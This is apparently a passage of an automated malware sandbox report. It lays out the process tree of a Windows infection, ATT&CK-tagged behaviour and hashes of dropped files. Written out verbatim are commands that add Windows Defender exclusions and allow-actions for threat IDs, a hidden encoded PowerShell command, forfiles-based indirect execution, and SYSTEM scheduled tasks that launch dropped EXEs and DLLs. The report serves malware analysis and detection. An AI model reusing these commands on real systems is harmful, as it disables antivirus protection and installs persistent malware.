                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4864
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:2076
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4200
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\COkqITLjU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\COkqITLjU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JObHBItpcGleC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JObHBItpcGleC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFkYfuKVacUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFkYfuKVacUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fRaJVJSWwewU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fRaJVJSWwewU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wTVsRuZmkGlUMZVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wTVsRuZmkGlUMZVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yryKlDDJVLpCRzjJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yryKlDDJVLpCRzjJ\" /t REG_DWORD /d 0 /reg:64;"
                                                  2⤵
                                                  • Drops file in System32 directory
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2188
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COkqITLjU" /t REG_DWORD /d 0 /reg:32
                                                    3⤵
                                                      PID:4276
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COkqITLjU" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2112
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COkqITLjU" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2380
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JObHBItpcGleC" /t REG_DWORD /d 0 /reg:32
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4360
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JObHBItpcGleC" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2784
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFkYfuKVacUn" /t REG_DWORD /d 0 /reg:32
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3496
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFkYfuKVacUn" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:4072
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                          PID:5088
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR" /t REG_DWORD /d 0 /reg:64
                                                          3⤵
                                                            PID:3556
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fRaJVJSWwewU2" /t REG_DWORD /d 0 /reg:32
                                                            3⤵
                                                              PID:1752
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fRaJVJSWwewU2" /t REG_DWORD /d 0 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2348
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wTVsRuZmkGlUMZVB /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                                PID:4828
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wTVsRuZmkGlUMZVB /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4516
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2092
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                  PID:2324
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL /t REG_DWORD /d 0 /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1464
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4788
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yryKlDDJVLpCRzjJ /t REG_DWORD /d 0 /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2404
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yryKlDDJVLpCRzjJ /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3640
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "gChFZySTq" /SC once /ST 04:37:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                2⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:2280
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /run /I /tn "gChFZySTq"
                                                                2⤵
                                                                  PID:2660
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "gChFZySTq"
                                                                  2⤵
                                                                    PID:3956
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "yDfhldrwGlWiUkcIx" /SC once /ST 04:49:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\yryKlDDJVLpCRzjJ\OYoaGPjQGJQPoSV\VmFdaUY.exe\" 8Y /aaskdidmB 385137 /S" /V1 /F
                                                                    2⤵
                                                                    • Drops file in Windows directory
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:1788
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /run /I /tn "yDfhldrwGlWiUkcIx"
                                                                    2⤵
                                                                      PID:3536
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        3⤵
                                                                          PID:3012
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 940
                                                                        2⤵
                                                                        • Program crash
                                                                        PID:664
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                      1⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4924
                                                                      • C:\Windows\system32\gpupdate.exe
                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                        2⤵
                                                                          PID:4648
                                                                      • \??\c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                        1⤵
                                                                          PID:3280
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                          1⤵
                                                                            PID:3572
                                                                          • \??\c:\windows\system32\gpscript.exe
                                                                            gpscript.exe /RefreshSystemParam
                                                                            1⤵
                                                                              PID:3648
                                                                            • C:\Windows\Temp\yryKlDDJVLpCRzjJ\OYoaGPjQGJQPoSV\VmFdaUY.exe
                                                                              C:\Windows\Temp\yryKlDDJVLpCRzjJ\OYoaGPjQGJQPoSV\VmFdaUY.exe 8Y /aaskdidmB 385137 /S
                                                                              1⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Drops Chrome extension
                                                                              • Drops file in System32 directory
                                                                              • Drops file in Program Files directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1684
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                2⤵
                                                                                  PID:1652
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                    3⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:340
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4864
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                          PID:3712
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                      3⤵
                                                                                      • Indirect Command Execution
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1764
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                        4⤵
                                                                                          PID:4492
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:3476
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                        3⤵
                                                                                        • Indirect Command Execution
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:3252
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4896
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                            5⤵
                                                                                              PID:736
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                          3⤵
                                                                                          • Indirect Command Execution
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:3548
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                            4⤵
                                                                                              PID:1460
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                5⤵
                                                                                                  PID:3764
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                              3⤵
                                                                                              • Indirect Command Execution
                                                                                              PID:3760
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                4⤵
                                                                                                  PID:636
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                    5⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3172
                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                      6⤵
                                                                                                        PID:4828
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "bcCGPajShxGMlZQUJS"
                                                                                                2⤵
                                                                                                  PID:2404
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                  2⤵
                                                                                                    PID:3348
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                      3⤵
                                                                                                      • Indirect Command Execution
                                                                                                      PID:4064
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3284
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                          5⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3180
                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                            6⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:800
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\COkqITLjU\jtakgj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fvhMoXYTjforzzT" /V1 /F
                                                                                                    2⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:3872
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "fvhMoXYTjforzzT2" /F /xml "C:\Program Files (x86)\COkqITLjU\SmgGCLq.xml" /RU "SYSTEM"
                                                                                                    2⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2708
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /END /TN "fvhMoXYTjforzzT"
                                                                                                    2⤵
                                                                                                      PID:4056
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "fvhMoXYTjforzzT"
                                                                                                      2⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4936
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        3⤵
                                                                                                          PID:2188
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "KOUxHKtLWmQusY" /F /xml "C:\Program Files (x86)\fRaJVJSWwewU2\OsjbxXa.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4868
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "pNkouUgxJvHwd2" /F /xml "C:\ProgramData\wTVsRuZmkGlUMZVB\bqLsGSs.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4048
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "DzewYbfCbqdMiHTlz2" /F /xml "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR\eJXumPg.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4636
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "fpGcAwSIrMdFmUtmmlf2" /F /xml "C:\Program Files (x86)\JObHBItpcGleC\metckgP.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1360
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "NjBIbsaDplWhxmNVa" /SC once /ST 08:05:29 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\yryKlDDJVLpCRzjJ\sQOwPkfy\TkuETda.dll\",#1 /rZjBdidnB 385137" /V1 /F
                                                                                                        2⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:800
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "NjBIbsaDplWhxmNVa"
                                                                                                        2⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:324
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "yDfhldrwGlWiUkcIx"
                                                                                                        2⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1756
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 1764
                                                                                                        2⤵
                                                                                                        • Program crash
                                                                                                        PID:244
                                                                                                    • \??\c:\windows\system32\rundll32.EXE
                                                                                                      c:\windows\system32\rundll32.EXE "C:\Windows\Temp\yryKlDDJVLpCRzjJ\sQOwPkfy\TkuETda.dll",#1 /rZjBdidnB 385137
                                                                                                      1⤵
                                                                                                        PID:3180
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          c:\windows\system32\rundll32.EXE "C:\Windows\Temp\yryKlDDJVLpCRzjJ\sQOwPkfy\TkuETda.dll",#1 /rZjBdidnB 385137
                                                                                                          2⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Loads dropped DLL
                                                                                                          • Drops file in System32 directory
                                                                                                          • Enumerates system info in registry
                                                                                                          PID:3348
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /DELETE /F /TN "NjBIbsaDplWhxmNVa"
                                                                                                            3⤵
                                                                                                              PID:4156

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                          Filesize

                                                                                                          129B

                                                                                                          MD5

                                                                                                          a526b9e7c716b3489d8cc062fbce4005

                                                                                                          SHA1

                                                                                                          2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                          SHA256

                                                                                                          e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                          SHA512

                                                                                                          d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                        • C:\Program Files (x86)\COkqITLjU\SmgGCLq.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          52fcb5625dece3a655db38ba2b6a1637

                                                                                                          SHA1

                                                                                                          c6523e3fc97ffa25a5e981c417fab80ac21aface

                                                                                                          SHA256

                                                                                                          39a80704108604378ef5ce8bcc805d28e2f6c84ed9cd2ce439fe90b96753b9a5

                                                                                                          SHA512

                                                                                                          e27779a52b988b26031885478c6d4980abda3ce44e7d8f4fe571c4a65b925400378ffc3c40dc7c67e409779f0b12d2b5af4208d140bf80650046209b77a09106

                                                                                                        • C:\Program Files (x86)\JObHBItpcGleC\metckgP.xml

                                                                                                          Filesize

